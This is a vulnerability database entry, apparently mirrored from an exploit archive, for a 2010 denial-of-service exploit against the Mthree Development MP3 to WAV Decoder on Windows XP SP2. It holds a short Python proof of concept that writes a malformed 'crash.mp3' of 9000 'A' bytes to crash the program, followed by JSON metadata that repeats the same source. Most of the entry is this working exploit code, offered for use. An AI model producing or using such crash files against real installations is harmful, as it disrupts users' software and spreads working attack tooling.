ID EXPLOITPACK:22E2CB55180120050979BF62FB3F6B56
Type exploitpack
Reporter Oh Yaw Theng
Modified 2010-08-10T00:00:00
Description
Mthree Development MP3 to WAV Decoder - Denial of Service
# Exploit Title: Mthree Development MP3 to WAV Decoder (.mp3) DoS
# Date: 10 / 8 / 2010
# Author: Oh Yaw Theng
# Credit : ZAC003(4m!n)
# Software Link: http://www.mthreedev.com/setupmp3towav.exe
# Tested on: Windows XP SP 2
# CVE : N / A
# Description : Create the malicious .mp3 file , open up using Mthree , after that double click on the file .. Boom ! DEADBEEF !
#!/usr/bin/python
filename = "crash.mp3"
junk = "\x41" * 9000
exploit = junk
textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()
{"lastseen": "2020-04-01T19:04:35", "references": [], "description": "\nMthree Development MP3 to WAV Decoder - Denial of Service", "edition": 1, "reporter": "Oh Yaw Theng", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2010-08-10T00:00:00", "title": "Mthree Development MP3 to WAV Decoder - Denial of Service", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:35", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2020-04-01T19:04:35", "rev": 2}, "vulnersScore": 0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-08-10T00:00:00", "id": "EXPLOITPACK:22E2CB55180120050979BF62FB3F6B56", "href": "", "viewCount": 3, "sourceData": "# Exploit Title: Mthree Development MP3 to WAV Decoder (.mp3) DoS\n# Date: 10 / 8 / 2010\n# Author: Oh Yaw Theng\n# Credit : ZAC003(4m!n) \n# Software Link: http://www.mthreedev.com/setupmp3towav.exe\n# Tested on: Windows XP SP 2\n# CVE : N / A\n# Description : Create the malicious .mp3 file , open up using Mthree , after that double click on the file .. Boom ! DEADBEEF !\n\n#!/usr/bin/python\n\nfilename = \"crash.mp3\"\n\njunk = \"\\x41\" * 9000\n\nexploit = junk\n\ntextfile = open(filename,'w')\ntextfile.write(exploit)\ntextfile.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}
{}